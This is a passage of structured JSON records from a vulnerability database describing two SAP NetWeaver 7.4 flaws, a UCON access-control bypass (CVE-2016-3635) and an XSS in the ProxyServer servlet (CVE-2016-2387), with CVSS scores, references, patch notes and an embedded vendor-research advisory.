"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201610-0154",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "BID",
"id": "93501"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3635"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sergio Abraham and Pablo M\u00fcller.",
"sources": [
{
"db": "BID",
"id": "93501"
}
],
"trust": 0.3
},
"cve": "CVE-2016-3635",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.8,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2016-3635",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-3635",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-3635",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201610-420",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver 7.4 allows remote authenticated users to bypass an intended Unified Connectivity (UCON) access control list and execute arbitrary Remote Function Modules (RFM) by leveraging a connection created from earlier execution of an anonymous RFM included in a Communication Assembly, aka SAP Security Note 2139366. Vendors have confirmed this vulnerability SAP Security Note 2139366 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. SAP NetWeaver is prone to a security-bypass vulnerability. \nRemote attackers can exploit this issue to bypass certain security restrictions and gain unauthorized access to the application. \nSAP NetWeaver 7.4 is vulnerable; other versions may also be affected. Onapsis Security Advisory ONAPSIS-2016-002: SAP UCON Security Protection bypass\n\n1. Impact on Business\n=====================\nBy exploiting this vulnerability, an attacker could bypass protections implemented in the SAP systems, potentially executing arbitrary business processes. \n\nRisk Level: Medium\n\n2. Advisory Information\n=======================\n- Public Release Date: 09/22/2016\n- Last Revised: 09/22/2016\n- Security Advisory ID: ONAPSIS-2016-002\n- Onapsis SVS ID: ONAPSIS-00165\n- CVE: CVE-2016-3635\n- Researcher: Sergio Abraham and Pablo Muller\n- Vendor Provided CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)\n- Onapsis CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)\n\n3. Vulnerability Information\n============================\n- Vendor: SAP AG\n- Affected Components: SAP Netweaver 7.4\n- Vulnerability Class: Improper Access Control (CWE-284)\n- Remotely Exploitable: Yes\n- Locally Exploitable: No\n- Authentication Required: Yes\n- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass\n\n4. \n\n5. Those RFMs are in the final phase of UCON implementation and not included in a Communication Assembly (CA). That means that no user (regardless its privileges) should be able to execute those RFMs. \n\n6. \n\n7. Report Timeline\n==================\n- 03/03/2015: Onapsis provides vulnerability information to SAP AG. \n- 10/03/2015: SAP reported fix is In Process. \n- 14/04/2015: SAP reported fix is In Process. \n- 12/05/2015: SAP reported fix is In Process. \n- 09/06/2015: SAP reported fix is In Process. \n\n\n\nAbout Onapsis Research Labs\n===========================\nOnapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. \n\nAbout Onapsis, Inc. \n===================\nOnapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. \n\nHeadquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E\u0026Y, KPMG and PwC. \n\nOnapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. \n\nThese solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. \n\nFor more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. \n\n\n\n-- \nThis email and any files transmitted with it are confidential and intended \nsolely for the use of the individual or entity to whom they are addressed. \nIf you have received this email in error please notify the system manager. \nThis message contains confidential information and is intended only for the \nindividual named. If you are not the named addressee you should not \ndisseminate, distribute or copy this e-mail. \nPlease notify the sender immediately by e-mail if you have received this \ne-mail by mistake and delete this e-mail from your system. If you are not \nthe intended recipient you are notified that disclosing, copying, \ndistributing or taking any action in reliance on the contents of this \ninformation is strictly prohibited",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "BID",
"id": "93501"
},
{
"db": "PACKETSTORM",
"id": "139090"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-3635",
"trust": 2.8
},
{
"db": "BID",
"id": "93501",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005421",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "139090",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "93501"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "PACKETSTORM",
"id": "139090"
},
{
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"id": "VAR-201610-0154",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:29:55.017000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2098906",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP Netweaver Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=64796"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-284",
"trust": 1.0
},
{
"problemtype": "CWE-Other",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "NVD",
"id": "CVE-2016-3635"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://seclists.org/fulldisclosure/2016/oct/48"
},
{
"trust": 1.7,
"url": "https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/bid/93501"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-3635"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-3635"
},
{
"trust": 0.8,
"url": "https://www.onapsis.com/blog/analyzing-sap-security-notes-june-2016-edition"
},
{
"trust": 0.3,
"url": "https://websmp130.sap-ag.de/sap/support/notes/2139366"
},
{
"trust": 0.3,
"url": "http://go.pardot.com/e/127021/ap-ucon-security-bypass-v7-pdf/tjsgc/33695062"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-3635"
},
{
"trust": 0.1,
"url": "https://www.onapsis.com,"
}
],
"sources": [
{
"db": "BID",
"id": "93501"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "PACKETSTORM",
"id": "139090"
},
{
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "93501"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"db": "PACKETSTORM",
"id": "139090"
},
{
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-11T00:00:00",
"db": "BID",
"id": "93501"
},
{
"date": "2016-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"date": "2016-10-11T15:55:55",
"db": "PACKETSTORM",
"id": "139090"
},
{
"date": "2016-10-13T14:59:00.220000",
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"date": "2016-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-26T04:05:00",
"db": "BID",
"id": "93501"
},
{
"date": "2016-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-005421"
},
{
"date": "2016-11-28T20:12:05.437000",
"db": "NVD",
"id": "CVE-2016-3635"
},
{
"date": "2016-10-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver In Unified Connectivity Vulnerabilities that bypass access control lists",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005421"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "lack of information",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201610-420"
}
],
"trust": 0.6
}
}
var-201602-0119
Vulnerability from variot
Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571. Vendors have confirmed this vulnerability SAP Security Note 2220571 It is released as.By any third party Web Script or HTML May be inserted
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201602-0119",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.4"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2387"
}
]
},
"cve": "CVE-2016-2387",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-2387",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-2387",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201602-297",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in the Java Proxy Runtime ProxyServer servlet in SAP NetWeaver 7.4 allow remote attackers to inject arbitrary web script or HTML via the (1) ns or (2) interface parameter to ProxyServer/register, aka SAP Security Note 2220571. Vendors have confirmed this vulnerability SAP Security Note 2220571 It is released as.By any third party Web Script or HTML May be inserted",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-2387",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "137045",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-001578",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"id": "VAR-201602-0119",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:57:39.826000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 2220571",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-55451"
},
{
"title": "SAP NetWeaver Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=60233"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "NVD",
"id": "CVE-2016-2387"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.4,
"url": "https://erpscan.com/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"trust": 1.4,
"url": "https://erpscan.com/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 1.0,
"url": "http://packetstormsecurity.com/files/137045/sap-netweaver-as-java-7.4-cross-site-scripting.html"
},
{
"trust": 1.0,
"url": "http://seclists.org/fulldisclosure/2016/may/39"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-16-008-sap-netweaver-7-4-proxyserver-servlet-xss-vulnerability/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/press-center/blog/sap-security-notes-february-2016-review/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2387"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2387"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"date": "2016-02-16T15:59:01.117000",
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"date": "2016-02-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-03-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-001578"
},
{
"date": "2018-12-10T19:29:15.907000",
"db": "NVD",
"id": "CVE-2016-2387"
},
{
"date": "2016-02-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of Java Proxy Runtime ProxyServer Servlet cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-001578"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201602-297"
}
],
"trust": 0.6
}
}
var-201205-0127
Vulnerability from variot
